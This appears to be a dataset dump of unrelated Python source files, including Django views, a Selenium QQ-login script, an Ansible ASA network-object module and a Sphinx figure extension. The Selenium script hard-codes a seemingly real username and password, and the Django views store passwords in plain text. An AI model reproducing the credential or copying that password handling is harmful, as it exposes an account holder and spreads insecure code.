index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
22,400 | 3a51b33d6452d077678d8c3941302e0db9a1e4c3 | from django.contrib import admin
# Register your models here.
from django.contrib.auth.models import Group
from rest_framework.authtoken.models import Token
from user_app.models import User, ClientProfile, ConfirmationCode
admin.site.unregister(Group)
admin.site.unregister(Token)
class ClientInline(admin.StackedInline):
    # Edit a user's ClientProfile inline on the User admin change page.
    model = ClientProfile
    extra = 1  # show one blank profile form by default
class UserAdmin(admin.ModelAdmin):
    # Admin for the custom User model; lists key columns and embeds the
    # client profile inline defined above.
    model = User
    list_display = ['username', 'user_type', 'last_login']
    inlines = [ClientInline]
admin.site.register(User, UserAdmin)
admin.site.register(ConfirmationCode)
|
22,401 | 6b632aaad6d1f60380b5822fb6a8966435a53c31 | # -*- coding: utf-8 -*-
# 开发团队 :AI悦创
# 开发人员 :AI悦创
# 开发时间 :2019/8/27 22:29
# 文件名称 :qq_zone_test.PY
# 开发工具 :PyCharm
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import quote
from pyquery import PyQuery
import time
url = 'https://qzone.qq.com/'
browser = webdriver.Chrome()
wait = WebDriverWait(browser, 10)
def qqzone_login(url, max_retries=3):
    """Open the QQ-zone page and switch to the account/password login form.

    Waits for the '#switcher_plogin' link and clicks it.  Retries up to
    ``max_retries`` times on a wait timeout instead of recursing without
    bound on any exception (the original used a bare ``except`` that
    re-entered itself forever and swallowed unrelated errors).
    """
    try:
        browser.get(url)
        # Wait for the "account login" switch link, then click it to
        # reveal the username/password form.
        log = wait.until(
            EC.presence_of_element_located(
                (By.CSS_SELECTOR, '#switcher_plogin')
            )
        )
        log.click()
    except TimeoutException:
        if max_retries > 0:
            qqzone_login(url, max_retries - 1)
        else:
            # Bug fix: original printed the misspelled 'Erroy' once per
            # unwound recursion frame.
            print('Error')
# def get_products():
# html = browser.page_source
# doc = PyQuery(html)
# items = doc('#mainsrp-itemlist .m-itemlist .items .item').items()
# for index, item in enumerate(items):
# products = []
# image = item.find('.pic .img').attr('data-src')
# price = item.find('.price').text()
# deal = item.find('.deal-cnt').text()
# title = item.find('.title').text()
# products.append([image, price, deal, title])
# str_1 = f"{deal},>>>{title}"
# print(products)
# print(str_1)
# wile = f'l{index}.csv'
# with open(wile, 'wb') as f:
# f.write(str_1.encode())
def login(url):
    """Fill the QQ login form inside the login iframe.

    NOTE(review): username and password are hard-coded below — move them
    to configuration or environment variables before sharing this script.
    """
    # browser.get('https://s.taobao.com/search?q=iPad')
    browser.get(url)
    time.sleep(10)
    # switch_to_frame is deprecated in newer Selenium releases;
    # presumably 'login_frame' is the QQ login iframe — verify against
    # the Selenium version in use.
    browser.switch_to_frame('login_frame')
    browser.find_element_by_id('img_out_1432803776').click()
    user_name_input = browser.find_element_by_id('TPL_username_1')
    user_name_input.clear()
    user_name_input.send_keys('黄帝2810')
    user_password_input = browser.find_element_by_id('TPL_password_1')
    user_password_input.clear()
    user_password_input.send_keys('Cleland18059572160')
    time.sleep(3)
    # NOTE(review): the submit button is located but never clicked, so
    # the login form is never actually submitted — confirm intent.
    submit = browser.find_element_by_id('J_SubmitStatic')
# qqzone_login(url)
login(url) |
class Solution:
    """
    @param pattern: a string, denote pattern string
    @param teststr: a string, denote matching string
    @return: a boolean, denote whether the pattern string and the matching string match or not
    """

    def wordPattern(self, pattern, teststr):
        """Return True iff there is a bijection between the characters of
        ``pattern`` and the space-separated words of ``teststr``.
        """
        if not pattern and not teststr:
            return True
        if not pattern or not teststr:
            return False
        words = teststr.split(' ')
        # Bug fix: the original indexed words[i] without checking that the
        # lengths matched, raising IndexError when the pattern was longer
        # and silently ignoring trailing words when it was shorter.
        if len(pattern) != len(words):
            return False
        pattern_to_word = {}
        word_to_pattern = {}
        for p, w in zip(pattern, words):
            if p in pattern_to_word:
                # Same pattern char must always map to the same word.
                if pattern_to_word[p] != w:
                    return False
            else:
                # New pattern char: the word must not already belong to a
                # different pattern char (bijection in both directions).
                if w in word_to_pattern and word_to_pattern[w] != p:
                    return False
                pattern_to_word[p] = w
                word_to_pattern[w] = p
        return True
if __name__ == '__main__':
    # Quick manual check of Solution.wordPattern on a matching pair.
    solver = Solution()
    sample_words = "a dog dog a"
    sample_pattern = "abba"
    print(solver.wordPattern(sample_pattern, sample_words))
22,403 | e7be4b5b00928a15a5322d464d3590a38dfc1eec | /home/charlie/anaconda3/lib/python3.6/sre_constants.py |
22,404 | f580278886a2cc3ba7eaecb4fca3d135d2959b7e | import os
from opsbro.collector import Collector
if os.name == 'nt':
import opsbro.misc.wmi as wmi
class IIS(Collector):
    """Collect IIS / ASP.NET performance counters through WMI (Windows only)."""

    def launch(self):
        """Query the configured perf counters and return them as a dict
        label -> value; returns False when the collector is not eligible.
        """
        # Only meaningful on Windows, where the WMI perf counters exist.
        if os.name != 'nt':
            self.set_not_eligible('This collector is only available on Windows')
            return False
        if not self.is_in_group('iis-server'):
            self.set_not_eligible('Please add the iis-server group to enable this collector.')
            # Bug fix: the original fell through and queried the counters
            # even though the node was just declared not eligible.
            return False
        data = {}
        # (label, perf-counter query, sampling delay) triples.
        counters = [
            (r'iis total bytes/sec', r'\web service(_total)\bytes total/sec', 100),
            (r'iis current connections', r'\web service(_total)\current connections', 0),
            (r'asp.net total requests failed', r'\asp.net applications(__total__)\requests failed', 0),
            (r'asp.net total requests/sec', r'\asp.net applications(__total__)\requests/sec', 100),
            (r'asp.net total errors/sec', r'\asp.net applications(__total__)\errors total/sec', 100),
            (r'asp.net total pipeline instance count', r'\asp.net applications(__total__)\pipeline instance count', 0),
            (r'asp.net total sessions active', r'\asp.net applications(__total__)\sessions active', 0),
            (r'asp.net requests queued', r'\asp.net\requests queued', 0),
        ]
        for _label, _query, _delay in counters:
            try:
                v = wmi.wmiaccess.get_perf_data(_query, unit='double', delay=_delay)
            except WindowsError:  # no such counter on this host; skip it
                continue
            data[_label] = v
        return data
|
22,405 | 3b37514344eaaa5f9980ab1f08ccaffc5bf3247e | import json
import requests
from django.conf import settings
from mohawk import Sender
from barriers.models import Company
from utils.exceptions import APIHttpException, DataHubException
class DatahubClient:
    """Thin Data Hub API client that signs every request with Hawk."""

    def request(self, method, path, **kwargs):
        """Send *method* to ``DATAHUB_URL + path`` with *kwargs* as the JSON
        body and return the decoded JSON response.

        Raises DataHubException when DATAHUB_URL is unset and
        APIHttpException on a non-2xx response.
        """
        if not settings.DATAHUB_URL:
            raise DataHubException("DATAHUB_URL is not set")
        url = f"{settings.DATAHUB_URL}{path}"
        credentials = {
            "id": settings.DATAHUB_HAWK_ID,
            "key": settings.DATAHUB_HAWK_KEY,
            "algorithm": "sha256",
        }
        # Hawk-sign the request; content hashing is deliberately skipped
        # (always_hash_content=False).
        sender = Sender(
            credentials,
            url,
            method,
            content=json.dumps(kwargs),
            content_type="application/json",
            always_hash_content=False,
        )
        headers = {"Authorization": sender.request_header}
        # TLS verification is disabled when DEBUG is on.
        response = getattr(requests, method)(
            url, verify=not settings.DEBUG, headers=headers, json=kwargs
        )
        try:
            response.raise_for_status()
        except requests.exceptions.HTTPError as e:
            raise APIHttpException(e)
        return response.json()

    def get(self, path, **kwargs):
        """GET *path*; kwargs become the JSON body."""
        return self.request("get", path, **kwargs)

    def post(self, path, **kwargs):
        """POST *path*; kwargs become the JSON body."""
        return self.request("post", path, **kwargs)

    def patch(self, path, **kwargs):
        """PATCH *path*; kwargs become the JSON body."""
        return self.request("patch", path, **kwargs)

    def put(self, path, **kwargs):
        """PUT *path*; kwargs become the JSON body."""
        return self.request("put", path, **kwargs)

    def get_company(self, id):
        """Fetch one company by id and wrap it in a Company model."""
        path = f"/v4/public/company/{id}"
        return Company(self.get(path))

    def search_company(self, query, page=1, limit=20, **kwargs):
        """Search companies by name; returns {'count', 'results'} with
        results wrapped in Company models.  *page* is 1-based."""
        params = {
            "original_query": query,
            "offset": (page * limit) - limit,
            "limit": limit,
        }
        path = "/v4/public/search/company"
        data = self.post(path, **params)
        return {
            "count": data["count"],
            "results": [Company(company) for company in data["results"]],
        }
|
22,406 | 49bf5fe221f1b06238f43418f6c6b7421ce4fbbb | #
# Copyright (c) 2013, Prometheus Research, LLC
#
from docutils import nodes
from docutils.parsers.rst import Directive, directives
from docutils.parsers.rst.directives.images import Figure
from sphinx.util.osutil import ensuredir
from subprocess import Popen, PIPE
import os, os.path, tempfile, shutil
from bdp.render import render_tikz
from hashlib import sha1 as sha
from shutil import copyfile
class BdpFigureDirective(Figure):
    """``bdpfigure`` reST directive: a Figure whose content is bdp source.

    The raw directive content (the bdp drawing code) is stashed on the
    produced figure node as ``bdpfigure`` for render_bdp_images() below.
    """
    required_arguments = 0
    has_content = True
    option_spec = Figure.option_spec.copy()
    option_spec['caption'] = directives.unchanged

    def run(self):
        self.arguments = ['']
        text = '\n'.join(self.content)
        try:
            # Replace the content with just the caption so Figure.run()
            # renders the caption; trim all other content lines.
            self.content[0] = self.options['caption']
            while len(self.content) > 1:
                self.content.trim_end(len(self.content) - 1)
        except:
            # No 'caption' option or empty content: render without one.
            self.content = None
        (figure_node,) = Figure.run(self)
        if isinstance(figure_node, nodes.system_message):
            return [figure_node]
        # Keep the bdp source for the doctree-read rendering pass.
        figure_node.bdpfigure = text
        return [figure_node]
class BdpFigureError(Exception):
    """Raised when rendering a bdp figure fails."""
    pass


class bdpfigure(nodes.General, nodes.Element):
    # Docutils node type for bdp figures; only referenced by the
    # commented-out add_node() call in setup() — apparently unused.
    pass
def render_bdpfigure(app, filename, options):
    """Render one bdp source file (*filename*) to a PDF in the build
    output directory and return the PDF's base name.

    Skips the render when an up-to-date PDF already exists.
    """
    directory = os.path.dirname(filename)
    basename = os.path.basename(filename)
    stem = os.path.splitext(basename)[0]
    name = stem + '.pdf'
    outdir = os.path.join(app.builder.outdir, '_bdpfigure')
    try:
        print(os.path.getmtime(filename))
        print(os.path.getmtime(os.path.join(app.builder.outdir, name)))
        # Up-to-date check: skip when the existing PDF is newer than the source.
        if (os.path.getmtime(filename) <
                os.path.getmtime(os.path.join(app.builder.outdir, name))):
            print("Skipping:", filename)
            return name
    except FileNotFoundError:
        # First build of this figure: nothing to compare against.
        pass
    if not os.path.exists(outdir):
        os.makedirs(outdir)
    # Search path for bdp inputs: the source's directory plus any
    # configured bdpfigure_bdpinputs directories.
    bdpinputs = [directory]
    for bdpdir in app.env.config.bdpfigure_bdpinputs:
        bdpdir = os.path.join(app.env.srcdir, bdpdir)
        bdpinputs.append(bdpdir)
    # bdpinputs.append('')
    # bdpinputs = ':'.join(bdpinputs)
    environ = os.environ.copy()
    environ['TEXINPUTS'] = outdir + ':'
    # bdp source -> .tex, then pdflatex -> .pdf, then copy into outdir.
    render_tikz(basename, outdir, bdpinputs)
    cmdline = [app.env.config.bdpfigure_pdftex,
               '-halt-on-error',
               '-interaction', 'nonstopmode',
               '-output-directory', outdir,
               os.path.join(outdir, stem) + '.tex']
    shell(cmdline, env=environ)
    copyfile(os.path.join(outdir, stem) + '.pdf',
             os.path.join(app.builder.outdir, name))
    # Disabled PNG pipeline (pdftoppm -> pnmcrop -> pnmtopng) kept for
    # reference:
    # cmdline = [app.env.config.bdpfigure_pdftoppm,
    #            '-r', str(app.env.config.bdpfigure_resolution),
    #            '-f', '1', '-l', '1',
    #            os.path.join(outdir, stem)+'.pdf',
    #            os.path.join(outdir, stem)]
    # shell(cmdline)
    # ppmfile = os.path.join(outdir, stem)+'-1.ppm'
    # if not os.path.exists(ppmfile):
    #     raise BdpFigureError("file not found: %s" % ppmfile)
    #
    # data = open(ppmfile, 'rb').read()
    # cmdline = [app.env.config.bdpfigure_pnmcrop]
    # data = shell(cmdline, data)
    # line = data.splitlines()[1]
    # width, height = [int(chunk) for chunk in line.split()]
    # cmdline = [app.env.config.bdpfigure_pnmtopng,
    #            '-transparent', 'white',
    #            '-compression', '9']
    #
    # data = shell(cmdline, data)
    #
    # open(os.path.join(app.builder.outdir, name), 'wb').write(data)
    return name
def shell(cmdline, input=None, env=None):
    """Run *cmdline*, feed it *input* on stdin, and return its stdout.

    Raises BdpFigureError when the executable cannot be started or when
    it exits with a non-zero status (the error text carries stderr, or
    stdout if stderr was empty).
    """
    try:
        proc = Popen(cmdline, stdin=PIPE, stdout=PIPE, stderr=PIPE, env=env)
    except OSError as exc:
        raise BdpFigureError("cannot start executable `%s`: %s"
                             % (' '.join(cmdline), exc))
    stdout, stderr = proc.communicate(input)
    if proc.returncode == 0:
        return stdout
    message = stderr or stdout
    raise BdpFigureError("`%s` exited with an error:\n%s"
                         % (' '.join(cmdline), message))
def visit_bdpfigure(self, node):
    # No-op visitor: the figure's image child produces the output.
    pass


def depart_bdpfigure(self, node):
    # No-op.
    pass
def get_hashid(text):
    """Return the SHA-1 hex digest of *text* (UTF-8 encoded)."""
    digest = sha(text.encode('utf-8'))
    return digest.hexdigest()
def render_bdp_images(app, doctree):
    """Sphinx ``doctree-read`` handler: render every bdp figure to a PDF
    and point the figure's image node at the rendered file."""
    for fig in doctree.traverse(nodes.figure):
        if hasattr(fig, 'bdpfigure'):
            # Figure produced by the bdpfigure directive: dump its bdp
            # source to a generated .py file keyed by a content hash.
            text = fig.bdpfigure
            hashid = get_hashid(text)
            fname = 'plot-%s' % (hashid)
            if os.path.exists(os.path.join(app.builder.outdir, fname) + '.pdf'):
                # Already rendered for identical source; nothing to do.
                continue
            outdir = os.path.join(app.builder.outdir, '_bdpfigure')
            if not os.path.exists(outdir):
                os.makedirs(outdir)
            filename = os.path.join(outdir, fname + '.py')
            with open(filename, 'wb') as f:
                f.write("from bdp.node import *\n\n".encode())
                f.write(text.encode())
        else:
            # Ordinary figure: only handle images whose uri is a .py file
            # (a bdp source referenced directly by path).
            try:
                image = fig.children[0]
                filename = image['uri']
                basename = os.path.basename(filename)
                extension = os.path.splitext(basename)[1]
                if (extension != '.py'):
                    continue
                env = app.env
                docdir = os.path.dirname(env.doc2path(env.docname, base=None))
                # Absolute uris are relative to the source root; others
                # are relative to the current document's directory.
                if filename.startswith('/'):
                    filename = os.path.normpath(filename[1:])
                else:
                    filename = os.path.normpath(os.path.join(docdir, filename))
                env.note_dependency(filename)
                filename = os.path.join(env.srcdir, filename)
            except:
                continue
        # try:
        print(filename)
        fname = render_bdpfigure(app, filename, fig)
        print(fname)
        image = fig.children[0]
        image['uri'] = fname
        # except BdpFigureError as exc:
        #     app.builder.warn('gnuplot error: ' + str(exc))
        #     fig.replace_self(nodes.literal_block(text, text))
        #     continue
def setup(app):
    """Register the bdpfigure Sphinx extension: configuration values, the
    doctree-read rendering hook, and the ``bdpfigure`` directive."""
    app.add_config_value('bdpfigure_pdftex', 'pdflatex', 'env')
    app.add_config_value('bdpfigure_pdftoppm', 'pdftoppm', 'env')
    app.add_config_value('bdpfigure_pnmcrop', 'pnmcrop', 'env')
    app.add_config_value('bdpfigure_pnmtopng', 'pnmtopng', 'env')
    app.add_config_value('bdpfigure_bdpinputs', [], 'env')
    app.add_config_value('bdpfigure_resolution', 256, 'env')
    app.connect('doctree-read', render_bdp_images)
    app.add_directive('bdpfigure', BdpFigureDirective)
    # app.add_node(bdpfigure,
    #              latex=(visit_bdpfigure, depart_bdpfigure))
22,407 | 5bb1a621dd9343d809f2405f0970dbf351ece123 | #!/usr/bin/env python2.7
# Copyright (c) 2017 Sybil Melton, Dominion Enterprises
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Extends RASA module written by Patrick Ogenstad <patrick@ogenstad.com> https://github.com/networklore/rasa
DOCUMENTATION = '''
---
module: asa_rest_networkobject
short_description: Log in to an ASA with REST API
description:
- Offers ability to log in to an ASA with the REST API and retrieve serial number to verify connectivity and functionality
author: Sybil Melton
requirements:
- ASA REST 1.3
options:
type:
description:
- The type of object you are creating. Use slash notation for subnets, i.e. 192.168.0.0/24. Use - for ranges, i.e. 192.168.0.1-192.168.0.10.
choices: [ 'ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn' ]
required: false
description:
description:
- Description of the object
required: false
host:
description:
- IP or hostname of the ASA
required: true
name:
description:
- Name of the network object
required: true
password:
description:
- Password for the device
required: true
state:
description:
- State of the object
choices: [ 'present', 'absent' ]
required: true
username:
description:
- Username for device
required: true
validate_certs:
description:
- If False, SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
choices: [ True, False]
default: True
required: false
value:
description:
- The data to enter into the network object
required: false
'''
EXAMPLES = '''
- asa_rest_networkobject:
host={{ ansible_host }}
username=api_user
password=APIpass123
name=WEB1_10.12.30.10
state=present
type=ipv4_address
description='Test web server'
value='10.12.30.10'
validate_certs=False
- asa_rest_networkobject:
host={{ ansible_host }}
username=api_user
password=APIpass123
name=WEB1_10.12.30.10
state=absent
validate_certs=False
'''
RETURN = '''
changed:
description: Returns the status code
returned: True
type: string
sample: true
result:
description: Returns the json
returned: True
type: string
sample: "result": { "kind": "object#QuerySerialNumber", "serialNumber": "9AFMQXLC3TS"}
'''
import urllib3
import logging
from ansible.module_utils.basic import *
import requests
import json
import sys
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'ANSIBLE'
}
object_kind = {
'ipv4_address': 'IPv4Address',
'ipv6_address': 'IPv6Address',
'ipv4_subnet': 'IPv4Network',
'ipv6_subnet': 'IPv6Network',
'ipv4_range': 'IPv4Range',
'ipv6_range': 'IPv6Range',
'ipv4_fqdn': 'IPv4FQDN',
'ipv6_fqdn': 'IPv6FQDN'
}
class ASA(object):
    """Minimal client for the Cisco ASA REST API (basic-auth over HTTPS)."""

    def __init__(self, device=None, username=None, password=None, verify_cert=True, timeout=5):
        # device: IP or hostname of the ASA; timeout is per-request seconds.
        self.device = device
        self.username = username
        self.password = password
        self.verify_cert = verify_cert
        self.timeout = timeout
        self.cred = HTTPBasicAuth(self.username, self.password)

    ######################################################################
    # General Functions
    ######################################################################
    def _delete(self, request):
        """DELETE https://<device>/api/<request>; returns the Response."""
        url = 'https://' + self.device + '/api/' + request
        data = requests.delete(url, headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        return data

    def _get(self, request):
        """GET https://<device>/api/<request>; returns the Response."""
        url = 'https://' + self.device + '/api/' + request
        data = requests.get(url, headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        return data

    def _patch(self, request, data):
        """PATCH with *data* JSON-encoded as the body; returns the Response."""
        url = 'https://' + self.device + '/api/' + request
        data = requests.patch(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        return data

    def _post(self, request, data=False):
        """POST with optional JSON body (*data* is False for body-less posts)."""
        url = 'https://' + self.device + '/api/' + request
        if data != False:
            data = requests.post(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        else:
            data = requests.post(url, headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        return data

    def _put(self, request, data):
        """PUT with *data* JSON-encoded as the body; returns the Response."""
        url = 'https://' + self.device + '/api/' + request
        data = requests.put(url, data=json.dumps(data), headers=HEADERS, auth=self.cred, verify=self.verify_cert, timeout=self.timeout)
        return data

    ######################################################################
    # <OBJECTS>
    ######################################################################
    # Functions related to network objects, or "object network" in the
    # ASA configuration
    ######################################################################
    def create_networkobject(self, data):
        """Create a new network object from *data*."""
        request = 'objects/networkobjects'
        return self._post(request, data)

    def delete_networkobject(self, net_object):
        """Delete the named network object."""
        request = 'objects/networkobjects/' + net_object
        return self._delete(request)

    def get_networkobject(self, net_object):
        """Fetch one named network object."""
        request = 'objects/networkobjects/' + net_object
        return self._get(request)

    def get_networkobjects(self):
        """Fetch all network objects."""
        request = 'objects/networkobjects'
        return self._get(request)

    # def get_networkservices(self):
    #     request = 'objects/predefinednetworkservices'
    #     return self._get(request)

    def update_networkobject(self, name, data):
        """Replace the named network object with *data* (PUT)."""
        request = 'objects/networkobjects/' + name
        return self._put(request, data)

    ######################################################################
    # Functions related to specific commands
    ######################################################################
    def write_mem(self):
        """Saves the running configuration to memory
        """
        request = 'commands/writemem'
        return self._post(request)
urllib3.disable_warnings()
logging.captureWarnings(True)
def match_objects(current_data, desired_data, module):
    """Return True when the object on the device already matches the
    desired definition (description presence/value and host value).

    *module* is accepted for signature compatibility; it is not used.
    """
    has_current_desc = 'description' in current_data
    has_desired_desc = 'description' in desired_data
    # One side has a description and the other does not -> differ.
    if has_current_desc != has_desired_desc:
        return False
    if has_desired_desc and current_data['description'] != desired_data['description']:
        return False
    # Bug fix: use .get() so an object without a 'host' entry compares as
    # unequal instead of raising KeyError.
    if current_data.get('host') != desired_data.get('host'):
        return False
    return True
def update_object(dev, module, desired_data):
    """PUT the desired definition over an existing object.

    Returns a changed-status dict with 'previous' and 'result' snapshots;
    fails the Ansible module on connection errors or unexpected codes.
    """
    try:
        before = dev.get_networkobject(desired_data['name'])
        result = dev.update_networkobject(desired_data['name'], desired_data)
    except:
        err = sys.exc_info()[0]
        module.fail_json(msg='Unable to connect to device: %s' % err)
    # 204 No Content signals a successful update on the ASA REST API.
    if result.status_code == 204:
        data = dev.get_networkobject(desired_data['name'])
        return_status = {'changed': True, 'previous': before.json(), 'result': data.json()}
    else:
        module.fail_json(msg='Unable to update object code: - %s' % result.status_code)
    return return_status
def create_object(dev, module, desired_data):
    """Create a network object from *desired_data*.

    Returns a changed-status dict with the created object; fails the
    Ansible module on connection errors or unexpected codes.
    """
    try:
        result = dev.create_networkobject(desired_data)
    except:
        err = sys.exc_info()[0]
        module.fail_json(msg='Unable to connect to device: %s' % err)
    # 201 Created signals success.
    if result.status_code == 201:
        data = dev.get_networkobject(desired_data['name'])
        return_status = {'changed': True, 'result': data.json()}
    else:
        module.fail_json(msg='Unable to create object - %s' % result.status_code)
    return return_status
def delete_object(dev, module, name):
    """Delete the named network object.

    Returns a changed-status dict with the pre-delete snapshot; fails the
    Ansible module on connection errors or unexpected codes.
    """
    try:
        before = dev.get_networkobject(name)
        result = dev.delete_networkobject(name)
    except:
        err = sys.exc_info()[0]
        module.fail_json(msg='Unable to connect to device: %s' % err)
    # 204 No Content signals a successful delete.
    if result.status_code == 204:
        return_status = {'previous': before.json(), 'changed': True}
    else:
        module.fail_json(msg='Unable to delete object - %s' % result.status_code)
    return return_status
def main():
    """Ansible entry point: ensure the ASA network object is present or
    absent, reporting changed/unchanged status back to Ansible."""
    module = AnsibleModule(
        argument_spec=dict(
            host=dict(required=True),
            username=dict(required=True),
            password=dict(required=True),
            validate_certs=dict(required=False, choices=[True, False], default=True),
            provider=dict(required=False),
            name=dict(required=True),
            description=dict(required=False),
            state=dict(required=True, choices=['absent', 'present']),
            type=dict(required=False, choices=['ipv4_address', 'ipv6_address', 'ipv4_subnet', 'ipv6_subnet', 'ipv4_range', 'ipv6_range', 'ipv4_fqdn', 'ipv6_fqdn']),
            value=dict(required=False)),
        required_together=(['type', 'value'],
                           ),
        supports_check_mode=False
    )
    name = module.params['name']
    objectId = module.params['name']
    type = module.params['type']
    value = module.params['value']
    state = module.params['state']
    if state == "present":
        # Bug fix: the original tested `type == False`, which is never
        # true for an omitted option (None), so the guard never fired.
        if not type:
            module.fail_json(msg='Category not defined')
    dev = ASA(
        username=module.params['username'],
        password=module.params['password'],
        device=module.params['host'],
        verify_cert=module.params['validate_certs']
    )
    # Build the desired object definition for the ASA REST API.
    desired_data = {}
    desired_data['name'] = name
    desired_data['objectId'] = objectId
    desired_data['kind'] = 'object#NetworkObj'
    if type:
        kind = object_kind[type]
        desired_data['host'] = {
            'kind': kind,
            'value': value
        }
    if module.params['description']:
        desired_data['description'] = module.params['description']
    try:
        data = dev.get_networkobject(name)
    except:
        err = sys.exc_info()[0]
        module.fail_json(msg='Unable to connect to device: %s' % err)
    if data.status_code == 200:
        # Object exists on the device.
        if state == 'absent':
            changed_status = delete_object(dev, module, name)
        elif state == 'present':
            matched = match_objects(data.json(), desired_data, module)
            if matched:
                changed_status = {'changed': False, 'result': data.json()}
            else:
                changed_status = update_object(dev, module, desired_data)
    elif data.status_code == 401:
        module.fail_json(msg='Authentication error')
    elif data.status_code == 404:
        # Object does not exist yet.
        if state == 'absent':
            changed_status = {'changed': False, 'result': data.json()}
        elif state == 'present':
            changed_status = create_object(dev, module, desired_data)
    else:
        module.fail_json(msg="Unsupported return code %s" % data.status_code)
    module.exit_json(**changed_status)


main()
|
22,408 | f0a071c42b74950b189d91620577e8deb55aae92 | from django import forms
from django.shortcuts import render_to_response
from django.http import HttpResponse, HttpResponseRedirect
from record.models import User, IssueType, IssueRecord
from record.form import UserForm
def regist(req):
    """Registration view: create a User from the posted form, then send
    the visitor to the login page."""
    if req.method == 'POST':
        uf = UserForm(req.POST)
        if uf.is_valid():
            username = uf.cleaned_data['username']
            password = uf.cleaned_data['password']
            # NOTE(review): password is stored in plain text — hash it.
            User.objects.create(username=username, password=password)
            return HttpResponseRedirect('/login/')
    else:
        uf = UserForm()
    # GET, or POST with an invalid form: re-render the form.
    return render_to_response('regist.html', {'uf': uf})
def login(req):
    """Login view: validate credentials against the User table, stash the
    username in the session, and show the index page with issue types."""
    if req.method == 'POST':
        uf = UserForm(req.POST)
        if uf.is_valid():
            username = uf.cleaned_data['username']
            password = uf.cleaned_data['password']
            # NOTE(review): plain-text password comparison — see regist().
            user = User.objects.filter(username__exact=username, password__exact=password)
            if user:
                req.session['username'] = username
                # read issue type from db
                issue = IssueType.objects.all()
                # return HttpResponseRedirect('/index/', {'issue':issue})
                return render_to_response('index.html', {'issue': issue})
            else:
                return HttpResponseRedirect('/login/')
    else:
        uf = UserForm()
    return render_to_response('login.html', {'uf': uf})
def index(req):
    """Home page; greets the logged-in user (or 'anybody')."""
    username = req.session.get('username', 'anybody')
    return render_to_response('index.html', {'username': username})


def logout(req):
    """Remove the session username and show the logout page; asks the
    visitor to log in when there is no session."""
    session = req.session.get('username', False)
    if session:
        del req.session['username']
        return render_to_response('logout.html', {'username': session})
    else:
        return HttpResponse('please login!')


def search_form(request):
    """Render the empty search form."""
    return render_to_response('search_form.html')
def search(request):
    """Search issue records whose name contains the ``q`` GET parameter;
    re-render the search form with an error flag when ``q`` is missing."""
    if 'q' in request.GET and request.GET['q']:
        q = request.GET['q']
        issueRecord = IssueRecord.objects.filter(issueName__icontains=q)
        return render_to_response('search_results.html', {'issueRecord': issueRecord})
    else:
        # Bug fix: the original returned HttpResponse('search_form.html', {...}),
        # which sends the literal file name as the response body (and misuses
        # the context dict as content_type) instead of rendering the template.
        return render_to_response('search_form.html', {'error': True})
|
# Read N card values; print the largest achievable total that is NOT a
# multiple of 10 (drop the smallest non-multiple-of-10 card if needed).
N = int(input())
s = []
Sum = 0
for i in range(N):
    s.append(int(input()))
    Sum += s[i]
s.sort()
if Sum % 10 != 0:
    print(Sum)
else:
    # Total is a multiple of 10: remove the smallest card that is not
    # itself a multiple of 10; if every card is, the answer is 0.
    for i in range(N):
        if s[i] % 10 != 0:
            print(Sum - s[i])
            break
        if i == N - 1:
            print(0)
22,410 | 82d7377c9103a531a0a332dd65d549a06325716b | import nltk
from nltk.corpus import genesis
# from nltk.corpus import gutenberg
from nltk.corpus import stopwords
# Tokenize Genesis (KJV) and compare token counts before and after
# removing English stopwords.
print(genesis.fileids())
# print(gutenberg.fileids())
genesis_book = genesis.raw('english-kjv.txt')
# bible = gutenberg.raw('bible-kjv.txt')
# tokenized_bible = nltk.tokenize.word_tokenize(bible)
tokenized_genesis = nltk.tokenize.word_tokenize(genesis_book)
# print(len(tokenized_bible))
print(len(tokenized_genesis))
stop_words = set(stopwords.words("english"))
# Keep only tokens that are not stopwords.
tokenized_genesis_nostop = [x for x in tokenized_genesis if not x in stop_words]
print(len(tokenized_genesis_nostop))
# print(len(tokenized_genesis))
print(tokenized_genesis)
print(tokenized_genesis_nostop)
|
22,411 | 504cd79ae6a8beb3440f990273ab29876865b9a6 | import matplotlib.pyplot as plt
import numpy as np
def main():
    """Build a small 2D point set, compute its convex hull with the
    gift-wrapping algorithm, and save a labelled plot to convex_hull.png."""
    points = np.array([
        [2, 2],
        [1, 1],
        [3, 4],
        [5, 2],
        [6, 3],
        [2, 5],
        [2, 6],
        [5, 4],
        [4, 3],
    ])
    convex_hull = gift_wrapping_algorithm(points)
    fig, ax = plt.subplots()
    ax.scatter(points[:, 0], points[:, 1], label='points')
    # The hull array is closed (first point repeated), so plot() draws
    # the full polygon outline.
    ax.plot(convex_hull[:, 0], convex_hull[:, 1], color='C1', label='convex hull')
    ax.set_xlabel('$x$')
    ax.set_ylabel('$y$')
    ax.set_title('The 2D convex hull for set of points.')
    ax.legend()
    plt.savefig('convex_hull.png')
def orientation(p0, p1, p2):
    """
    Returns 0 if points are co-linear, 1 if clockwise, -1 if counterclockwise.
    """
    # Cross product of the segments (p0 -> p1) and (p1 -> p2).
    cross = ((p1[1] - p0[1]) * (p2[0] - p1[0])
             - (p2[1] - p1[1]) * (p1[0] - p0[0]))
    if cross == 0.0:
        return 0
    elif cross < 0.0:
        return -1
    elif cross > 0.0:
        return 1
def gift_wrapping_algorithm(points):
    """Compute the 2D convex hull of *points* (an (N, 2) array) using the
    gift-wrapping (Jarvis march) approach.

    Returns an (M, 2) array of hull vertices in which the starting point
    is repeated at the end, closing the polygon for plotting.
    """
    print(f'gift_wrapping_algorithm() called with points = {points}')
    # Find left-most point to start
    x_vals = points[:, 0]
    y_vals = points[:, 1]
